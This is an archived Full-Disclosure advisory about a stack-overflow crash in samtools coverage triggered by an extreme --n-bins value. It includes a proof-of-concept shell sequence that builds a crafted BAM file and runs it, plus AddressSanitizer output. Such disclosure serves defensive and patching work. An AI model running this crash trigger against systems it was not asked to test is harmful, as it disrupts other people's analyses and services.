| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-GzspEa37GPgUA51NZGoMpW+8TfKOVVgMKEfO2XGV4h+xw@mail.gmail.com>
Date: Sun, 28 Sep 2025 12:13:48 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Samtools v1.22.1 Improper Handling of Excessive Histogram Bin
Counts in Samtools Coverage Leads to Stack Overflow
In the samtools coverage subcommand, the -w / --n-bins option allows the
user to specify how many “bins” to produce in the coverage histogram. The
code computes: stats[tid].bin_width = (stats[tid].end - stats[tid].beg) /
n_bins; When the number of bins (n_bins) is extremely large relative to the
region length (end - beg), this integer division can yield zero, or lead to
unexpected behavior in subsequent arithmetic. Later in print_hist(),
calculations involving current_bin, row_bin_size, and loop bounds can
overflow or cause invalid branching, eventually leading to stack recursion
or unbounded stack-consumption. In practice, supplying a huge bin count
(e.g. 2147483647) triggers stack overflow in print_hist() (as observed) and
crashes the program.
*Impact:*
- Denial of Service (DoS).
- Memory corruption.
*PoC (Proof of Concept)*
Create a minimal BAM with a large declared reference size and one read:
echo -e "@HD\tVN:1.6@SQ\tSN:chrX\tLN:500000000r1\t0\tchrX\t1\t60\t10M\t*\t0\t0\tAAAAAAAAAA\tIIIIIIIIII"
\ | ./samtools view -b -o huge.bam -
./samtools index huge.bam
Run coverage with a massive bin count:
./samtools coverage -w 2147483647 huge.bam
* Expected crash:*
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1070796==ERROR: AddressSanitizer: stack-overflow on address
0xfffef18a7ff0 (pc 0xab400a2993cc bp 0xffffdff5a910 sp 0xfffef18a7ff0 T0)
#0 0xab400a2993cc in print_hist /root/samtools/coverage.c:236:22
#1 0xab400a29c304 in main_coverage /root/samtools/coverage.c:674:13
#2 0xab400a286044 in main /root/samtools/bamtk.c:271:55
#3 0xff6004352290 in __libc_start_call_main
csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#4 0xff6004352374 in __libc_start_main csu/../csu/libc-start.c:360:3
#5 0xab400a15cc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId:
031fb204568f835410c0dd07ee99a915c9a7b660)
SUMMARY: AddressSanitizer: stack-overflow /root/samtools/coverage.c:236:22
in print_hist
==1070796==ABORTING
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists